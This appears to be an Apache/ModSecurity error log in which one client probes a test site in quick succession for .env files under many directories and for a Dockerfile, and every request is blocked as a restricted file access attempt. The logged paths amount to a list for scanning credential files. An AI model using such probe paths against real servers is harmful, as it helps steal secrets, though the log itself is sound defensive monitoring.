[Wed Jan 14 17:35:10.420360 2026] [:error] [pid 1413458] [client 34.220.197.24:42918] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWfFvsPNANEsYGk5QcxtFAAAAAI"]
[Wed Jan 14 17:35:10.420536 2026] [:error] [pid 1413458] [client 34.220.197.24:42918] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWfFvsPNANEsYGk5QcxtFAAAAAI"]
[Wed Jan 14 17:35:11.155958 2026] [:error] [pid 1413460] [client 34.220.197.24:43070] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWfFvwByDtVd7SkMa28kZQAAAAQ"]
[Wed Jan 14 17:35:11.156165 2026] [:error] [pid 1413460] [client 34.220.197.24:43070] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWfFvwByDtVd7SkMa28kZQAAAAQ"]
[Wed Jan 14 17:35:11.156327 2026] [:error] [pid 1413460] [client 34.220.197.24:43070] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aWfFvwByDtVd7SkMa28kZQAAAAQ"]
[Wed Jan 14 17:35:11.873341 2026] [authz_core:error] [pid 1413457] [client 34.220.197.24:43230] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Wed Jan 14 17:35:12.595914 2026] [:error] [pid 1413456] [client 34.220.197.24:43380] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWfFwMFbvLGMHoHvQxNzLgAAAAA"]
[Wed Jan 14 17:35:12.596119 2026] [:error] [pid 1413456] [client 34.220.197.24:43380] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWfFwMFbvLGMHoHvQxNzLgAAAAA"]
[Wed Jan 14 17:35:12.596293 2026] [:error] [pid 1413456] [client 34.220.197.24:43380] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aWfFwMFbvLGMHoHvQxNzLgAAAAA"]
[Wed Jan 14 17:35:13.314605 2026] [:error] [pid 1413485] [client 34.220.197.24:43554] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWfFwbz8c3lrfqFQknOrcQAAAAc"]
[Wed Jan 14 17:35:13.314835 2026] [:error] [pid 1413485] [client 34.220.197.24:43554] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWfFwbz8c3lrfqFQknOrcQAAAAc"]
[Wed Jan 14 17:35:13.314997 2026] [:error] [pid 1413485] [client 34.220.197.24:43554] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWfFwbz8c3lrfqFQknOrcQAAAAc"]
[Wed Jan 14 17:35:14.038942 2026] [:error] [pid 1413483] [client 34.220.197.24:43724] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWfFwkEv6TAVy2O49w-G3QAAAAU"]
[Wed Jan 14 17:35:14.039149 2026] [:error] [pid 1413483] [client 34.220.197.24:43724] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWfFwkEv6TAVy2O49w-G3QAAAAU"]
[Wed Jan 14 17:35:14.039349 2026] [:error] [pid 1413483] [client 34.220.197.24:43724] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aWfFwkEv6TAVy2O49w-G3QAAAAU"]
[Wed Jan 14 17:35:14.783874 2026] [:error] [pid 1413484] [client 34.220.197.24:43896] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWfFwvcsqy-MSlD5wL45GAAAAAY"]
[Wed Jan 14 17:35:14.784082 2026] [:error] [pid 1413484] [client 34.220.197.24:43896] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWfFwvcsqy-MSlD5wL45GAAAAAY"]
[Wed Jan 14 17:35:14.784252 2026] [:error] [pid 1413484] [client 34.220.197.24:43896] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWfFwvcsqy-MSlD5wL45GAAAAAY"]
[Wed Jan 14 17:35:15.508452 2026] [:error] [pid 1413459] [client 34.220.197.24:44042] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWfFw0mBk0CuCHAyPqetIQAAAAM"]
[Wed Jan 14 17:35:15.508660 2026] [:error] [pid 1413459] [client 34.220.197.24:44042] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWfFw0mBk0CuCHAyPqetIQAAAAM"]
[Wed Jan 14 17:35:15.508830 2026] [:error] [pid 1413459] [client 34.220.197.24:44042] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aWfFw0mBk0CuCHAyPqetIQAAAAM"]
[Wed Jan 14 17:35:16.227947 2026] [:error] [pid 1413458] [client 34.220.197.24:44196] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWfFxMPNANEsYGk5QcxtFQAAAAI"]
[Wed Jan 14 17:35:16.228152 2026] [:error] [pid 1413458] [client 34.220.197.24:44196] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWfFxMPNANEsYGk5QcxtFQAAAAI"]
[Wed Jan 14 17:35:16.228311 2026] [:error] [pid 1413458] [client 34.220.197.24:44196] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWfFxMPNANEsYGk5QcxtFQAAAAI"]
[Wed Jan 14 17:35:16.948775 2026] [:error] [pid 1413460] [client 34.220.197.24:44362] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWfFxAByDtVd7SkMa28kZgAAAAQ"]
[Wed Jan 14 17:35:16.949015 2026] [:error] [pid 1413460] [client 34.220.197.24:44362] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWfFxAByDtVd7SkMa28kZgAAAAQ"]
[Wed Jan 14 17:35:16.949173 2026] [:error] [pid 1413460] [client 34.220.197.24:44362] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.env"] [unique_id "aWfFxAByDtVd7SkMa28kZgAAAAQ"]
[Wed Jan 14 17:35:17.687710 2026] [:error] [pid 1413457] [client 34.220.197.24:44550] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWfFxdedw_XRw0xH6MrJUAAAAAE"]
[Wed Jan 14 17:35:17.687912 2026] [:error] [pid 1413457] [client 34.220.197.24:44550] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWfFxdedw_XRw0xH6MrJUAAAAAE"]
[Wed Jan 14 17:35:17.688071 2026] [:error] [pid 1413457] [client 34.220.197.24:44550] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aWfFxdedw_XRw0xH6MrJUAAAAAE"]
[Wed Jan 14 17:35:18.407982 2026] [:error] [pid 1413456] [client 34.220.197.24:44738] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWfFxsFbvLGMHoHvQxNzLwAAAAA"]
[Wed Jan 14 17:35:18.408194 2026] [:error] [pid 1413456] [client 34.220.197.24:44738] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWfFxsFbvLGMHoHvQxNzLwAAAAA"]
[Wed Jan 14 17:35:18.408348 2026] [:error] [pid 1413456] [client 34.220.197.24:44738] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aWfFxsFbvLGMHoHvQxNzLwAAAAA"]
[Wed Jan 14 17:35:19.126264 2026] [:error] [pid 1413485] [client 34.220.197.24:44930] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWfFx7z8c3lrfqFQknOrcgAAAAc"]
[Wed Jan 14 17:35:19.126494 2026] [:error] [pid 1413485] [client 34.220.197.24:44930] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWfFx7z8c3lrfqFQknOrcgAAAAc"]
[Wed Jan 14 17:35:19.126671 2026] [:error] [pid 1413485] [client 34.220.197.24:44930] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aWfFx7z8c3lrfqFQknOrcgAAAAc"]
[Wed Jan 14 17:35:19.866462 2026] [:error] [pid 1413483] [client 34.220.197.24:45100] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWfFx0Ev6TAVy2O49w-G3gAAAAU"]
[Wed Jan 14 17:35:19.866679 2026] [:error] [pid 1413483] [client 34.220.197.24:45100] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWfFx0Ev6TAVy2O49w-G3gAAAAU"]
[Wed Jan 14 17:35:19.866837 2026] [:error] [pid 1413483] [client 34.220.197.24:45100] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aWfFx0Ev6TAVy2O49w-G3gAAAAU"]
[Wed Jan 14 17:35:20.585585 2026] [:error] [pid 1413484] [client 34.220.197.24:45276] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWfFyPcsqy-MSlD5wL45GQAAAAY"]
[Wed Jan 14 17:35:20.585793 2026] [:error] [pid 1413484] [client 34.220.197.24:45276] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aWfFyPcsqy-MSlD5wL45GQAAAAY"]
